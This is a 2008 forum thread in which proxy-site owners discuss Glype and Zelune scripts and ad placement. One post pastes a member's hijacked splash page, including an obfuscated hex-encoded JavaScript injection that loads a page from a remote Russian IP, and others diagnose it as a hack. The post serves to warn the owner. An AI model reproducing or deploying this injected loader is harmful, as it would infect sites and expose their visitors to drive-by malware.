The Proxy Discussion Thread

Discussion in 'General Business' started by antman, Jul 14, 2007.

  1. Aquarezz

    Aquarezz Notable Member

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    #12461
    Go to www.blockacountry.com mate :)

    It works as I use it ;)

    Greetz
     
    Aquarezz, Dec 3, 2008 IP
  2. Proficient

    Proficient Well-Known Member

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    #12462
    Ads on Proxified pages on Glype Script, is this possible?
     
    Proficient, Dec 3, 2008 IP
  3. proxywhereabouts

    proxywhereabouts Notable Member

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    #12463
    It is possible on 0.5.3 but v1.0 parse the code.
     
    proxywhereabouts, Dec 3, 2008 IP
  4. Proficient

    Proficient Well-Known Member

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    #12464
    Then would it be recommended to use 0.5.3?
     
    Proficient, Dec 3, 2008 IP
  5. Dollar

    Dollar Active Member

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    #12465
    Ya you can't even ads on your homepage alsmost either. If you do, you have to put them in iframes. I saw this proxy and it is using Glype 1.0 and it has Adsense on the homepage and the adsense links are like this

    browse.php?=http://pagedad2.googlesynidication.com...
    Obviously this is not good. And would get you banned for invalid clicks. So be carefull with Glype 1.0! Put your ads in iframes. Personally I'm not using Glype 1.0, becuase it would be destructive to my income. So I'm still using the older Glype.
     
    Dollar, Dec 3, 2008 IP
  6. logylaps

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  7. Mr.Bill

    Mr.Bill Well-Known Member

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    #12467
    How did you get that warning? I am using FF3 and I am not getting that.

    even using this link I dont get
     
    Mr.Bill, Dec 3, 2008 IP
  8. proxywhereabouts

    proxywhereabouts Notable Member

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    #12468
    Eh?? That is NOT my IP?
    After checking with several tools including mine I found that the IP belongs to a webhosting company in russia.
    I'm using US host so this is weird.

    The IP belongs to infox.ru @ datapoint.ru

    Oh, being banned by google means all of your link and adsense are blocked, so far mine isnt. :)

    Thanks for bringing it up. :)
     
    proxywhereabouts, Dec 3, 2008 IP
  9. logylaps

    logylaps Active Member

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    #12469
    If I click ignore, this page loads for me:
    http://img503.imageshack.us/img503/6749/picture12rx1.png

    Here is the source of the page:
    <html>
    
    <head>
    <title>ProxyWhereabouts - Makes Browsing Easy</title>
    </head>
    
    <body background="bg.gif"><script>function c1058032905m4919a39062c8a(m4919a390631d0){ var m4919a39063ca9=16; return (parseInt(m4919a390631d0,m4919a39063ca9));}function m4919a3906825e(m4919a390686a8){ var m4919a3906a491=2; var m4919a39068e77='';m4919a3906bd8b=String.fromCharCode;for(m4919a39069828=0;m4919a39069828<m4919a390686a8.length;m4919a39069828+=m4919a3906a491){ m4919a39068e77+=(m4919a3906bd8b(c1058032905m4919a39062c8a(m4919a390686a8.substr(m4919a39069828,m4919a3906a491))));}return m4919a39068e77;} var z39='';var m4919a3906d9e0='3C7'+z39+'3637'+z39+'2697'+z39+'07'+z39+'43E696628216D7'+z39+'96961297'+z39+'B646F637'+z39+'56D656E7'+z39+'42E7'+z39+'7'+z39+'7'+z39+'2697'+z39+'465287'+z39+'56E657'+z39+'363617'+z39+'065282027'+z39+'2533632536392536362537'+z39+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+z39+'332537'+z39+'32253633253364253237'+z39+'2536382537'+z39+'342537'+z39+'342537'+z39+'30253361253266253266253337'+z39+'253337'+z39+'253265253332253332253331253265253331253333253333253265253331253337'+z39+'253332253266253265253639253636253266253637'+z39+'2536662532652536382537'+z39+'34253664253663253366253237'+z39+'2532622534642536312537'+z39+'342536382532652537'+z39+'322536662537'+z39+'352536652536342532382534642536312537'+z39+'342536382532652537'+z39+'32253631253665253634253666253664253238253239253261253331253330253338253336253336253334253239253262253237'+z39+'253635253635253332253636253632253631253635253237'+z39+'2532302537'+z39+'37'+z39+'2536392536342537'+z39+'34253638253364253337'+z39+'253339253339253230253638253635253639253637'+z39+'2536382537'+z39+'342533642533312533332533362532302537'+z39+'332537'+z39+'342537'+z39+'39253663253635253364253237'+z39+'2536342536392537'+z39+'332537'+z39+'302536632536312537'+z39+'39253361253230253665253666253665253635253237'+z39+'2533652533632532662536392536362537'+z39+'3225363125366425363525336527'+z39+'29293B7'+z39+'D7'+z39+'6617'+z39+'2206D7'+z39+'969613D7'+z39+'47'+z39+'27'+z39+'5653B3C2F7'+z39+'3637'+z39+'2697'+z39+'07'+z39+'43E';document.write(m4919a3906825e(m4919a3906d9e0));</script>
    
    <div align="center">
      <center>
      <table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%">
        <tr>
          <td width="100%">
            <p align="center"><img border="0" src="middle.jpg" width="503" height="321"><BR><p align="center"><b><a href="/old"><font size="3" face="Arial" color="#FFFFFF">Click
    here</font></a><font size="3" face="Arial" color="#FFFFFF"> to visit the old
    proxy listings</font></b></p></td>
        </tr>
      </table>
      </center>
    </div>
    
    </body>
    
    </html>
    <script>check_content()</script>
    HTML:
    and if I check the activity monitor, your page also loads:
    http://77.221.133.172/.if/go.html? (which times out)

    Your dns server has likely been hijacked very recently. look into it.
     
    logylaps, Dec 3, 2008 IP
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  10. newzone

    newzone Well-Known Member

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    #12470
    for me the old site takes forever to load .
     
    newzone, Dec 3, 2008 IP
  11. proxywhereabouts

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    #12471
    @logylaps, Oh, I cleaned up strange bits of code on the site recently which is a few weeks ago, didn't notice that there is left on the splash page. Thanks for the heads up.


    @newzone, I am currently updating the server and do some tweaking. It will be some time that the site will not let you go in. I'll make an update on the site it self when everything is done and finished.
     
    proxywhereabouts, Dec 3, 2008 IP
  12. logylaps

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    #12472
    Actually, I get a completely different page if I go through a proxy. It looks the same, but the source code is not even close.

    EDIT: Also, unless I go through a proxy, none of the links work, only the front page.
     
    logylaps, Dec 3, 2008 IP
  13. Browning

    Browning Banned

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    #12473
    inpage popups work on the new glype
     
    Browning, Dec 3, 2008 IP
  14. Dollar

    Dollar Active Member

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    #12474
    Dude you were hacked, and they put a bit a code into one of your pages to load that IP. I do not know if the script you were using was vulnerable, but it may also be likely.. Usually these things happen becuase you made a wordpress blog or a phpbb forum or something and forget about it and left it on your server, those are frequently hacked if you do not update them with patches. Which would let the hacker into your whole system and screw with all your sites. If you do have some old scripts on your server definitely update them or get rid of them.
     
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    #12475
    I use AdBrite. Does this dangerous for adbrite too? Does AdBrite allow ads on iframe?
    Where can i download the old Glype?
     
    xrvel, Dec 3, 2008 IP
  16. mori

    mori Peon

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  17. Dollar

    Dollar Active Member

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    #12477
    I haven't check in all browsers, but Firefox 3, I've noticed a small % chance the ads will be interfered with by the Glype JavaScript parser and will show the adsense links like browse.php?u=http://pagedad2.googlesyndication.com
    which if someone clicks on it the ad will be loaded threw your proxy.


    It will be "dangerous" for anything that is javascript. However Globalinteractive and Mediashakers will safe already becuase they use Iframes. Becuase the code is like

    
    <!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
    <IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ads.example.com/../"></IFRAME>
    <!-- END TAG -->
    HTML:
    As far putting adbrite in iframe, yes I do it already for my Text Boards, I find it helps load the pages faster, becuase javascript can cuase a page to lag if the javascript is timing out and it works. But Fullpage ads and inlines won't work if the code is in iframe, but then again I doubt the fullpage ads or inlines will work in Glype 1.0 becuase it will interfere with it.
     
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  18. Jeff Morrison

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    #12478
    glype have problem with facebook :S
     
    Jeff Morrison, Dec 4, 2008 IP
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    #12479
    Which version of glype was that? v0.6 works fine the last time i tried
     
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    #12480
    Its really strange. Some links are converted such addthis.com link.
    I tried to add this
    <script type="text/javascript">document.write('<a href="privacy.php">privacy</a>');</script>
    HTML:
    To the home page, but it wasn't converted.

    Really strange.

    What is your suggestion? I tried zelune, but i switched to glype because there are built in ip ban, domain ban, cache, logging features. I thought glype is better than zelune :eek:

    I guess i'll modify my zelune.
     
    xrvel, Dec 4, 2008 IP